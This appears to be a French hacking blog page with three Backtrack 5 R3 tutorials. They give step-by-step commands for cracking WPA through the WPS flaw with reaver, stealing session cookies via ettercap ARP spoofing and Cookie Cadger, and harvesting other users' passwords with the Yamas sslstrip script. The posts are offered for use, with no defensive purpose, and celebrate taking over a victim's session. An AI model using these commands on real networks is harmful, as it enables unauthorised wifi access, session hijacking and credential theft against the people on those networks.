acebook

Pages

mardi 26 novembre 2013

[Backtrack 5 R3] Crack WPA avec Reaver

 La fonction WPS (WiFi Protected Setup), permet de connecter simplement un équipement compatible au réseau wifi de votre box.
Crack Faille WPS avec Reaver 

1.Intialisez la carte wlan0
Sauvegardez raz dans "root"
(wlan0 par default,changez sinon le fichier raz) 
Dans un terminal tapez:
bash raz

2.Analysez les réseaux wifi 
airodump-ng mon0
ou
wash -i mon0 -C
3.Attaque WPS
reaver -i mon0 -b AP-MAC -c 5 -vv

Il faut entre 6h et 30h cela dépend de la protection de la box.


0 commentaires
Libellés :

[Backtrack 5 R3] Cookie Cadger Récupérer Cookies



Cookie Cadger
Cookie Cadger
Avec Backtrack 5 R3

Pour récupérer des cookies lorsque qu'un utilisateur est connecté sur une page,
j'utilise CookieCadger disponible à cette adresse https://www.cookiecadger.com
Utilisation de CookieCadger 
On va utiliser "Ettercap" pour capturer les paquets du réseau LAN.
Dans un terminal tapez : 
ettercap -T -M arp // //  
(capture tout le réseau)
Optionnel:
ettercap -Tq -M arp:remote -i eth0 /192.168.1.1/ /192.168.1.35/ 
(capture uniquement l'adresse 192.168.1.35)

-- Pour capturer en wifi rajouter l'inferface avec -i wlan0 --
ettercap -T -M arp // // -i wlan0

Lancez dans un autre terminal :
java -jar CookieCadger-1.06.jar
Sélectionnez votre interface
Start Capture on "eth0"
Dans Filter Domains les cookies des sites récupérés
Cliquez sur un site et faites Load Domain Cookies
Vous avez récupérez la session du site :-)

Enjoy !


0 commentaires
Libellés :

[Backtrack 5 R3] Yamas Récupérer Passwords

 
Yamas : Récupérer Passwords
Avec Backtrack 5 R3
Pour récupérer des mots de passes lorsque qu'un utilisateur se logue uniquement,
 j'utilise le script Yamas disponible à cette adresse http://comax.fr/yamas.php.
J'ai du le modifié car le chemin pour ssltrip était faux.
Dans le script au lieu de /usr/bin/sslstrip j'ai remplacé par
/pentest/web/sslstrip/sslstrip.py

Donc dans un premier temps vérifiez ou se trouve sslstrip.


Installation de Yamas
Mettez le dans le répertoire "root"
Dans un terminal tapez : bash yamas.sh
Maintenant il est installé dans /usr/bin/yamas

Utilisation de Yamas
Dans un terminal tapez : yamas
Validez par ENTRER à chaque fois (par default)
Sur un autre PC loguez-vous a un site
Dans la fenêtre Passwords vous verrez les MDP de certains sites
(exemple : facebook,google,youtube ne fonctionnent plus)
Pour sauvegarder faites : 6
Puis Y.
Sauvegarde : /root/yamas.pass.txt

Supprimer Yamas 
(Permet de refaire une installation propre)
Dans un terminal tapez : rm /usr/bin/yamas





Enjoy !






















0
commentaires

















Libellés :
















        

      









Inscription à :
Articles (Atom)